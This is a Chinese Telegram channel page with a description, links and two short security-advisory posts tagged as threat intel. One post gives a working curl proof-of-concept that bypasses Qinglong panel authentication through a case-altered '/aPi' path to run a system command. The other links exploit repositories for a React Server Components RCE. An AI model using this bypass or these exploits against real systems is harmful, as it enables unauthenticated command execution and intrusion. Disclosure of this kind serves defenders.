来自 @GamerNoTitle 的各种动态的发布频道,群聊在 @DohnaNyan,私聊请发送至 @PaffCreamPMBot
内群 https://t.me/+qYXa7ES7GPc0ZD
嫌频道太吵可以开免打扰,本频道会不定时发一些日常也好新闻也好,反正就是很杂(指日常发电)
Github: https://github.com/GamerNoTitle
Twitter: https://twitter.com/GamerNoTitle
Website: https://bili33.top
内群 https://t.me/+qYXa7ES7GPc0ZD
嫌频道太吵可以开免打扰,本频道会不定时发一些日常也好新闻也好,反正就是很杂(指日常发电)
Github: https://github.com/GamerNoTitle
Twitter: https://twitter.com/GamerNoTitle
Website: https://bili33.top
青龙面板最新版存在一处鉴权绕过漏洞,未认证请求可访问高权限接口,并最终触发命令执行。
攻击者可通过大小写变形路径(如
/API/...)绕过鉴权 curl -X PUT "http://localhost:5700/aPi/system/command-run" \ -H "Content-Type: application/json" \
-d '{"command": "id"}'
原文:https://mp.weixin.qq.com/s/mbjS5himBugBI_KX8pC68g
#威胁情报 #poc
React 官方团队披露了一个存在于 React Server Components (RSC) 中的严重远程代码执行漏洞,编号 CVE-2025-55182
https://github.com/ghe770mvp/RSC_Vuln_Lab
https://github.com/msanft/CVE-2025-55182
#威胁情报 #poc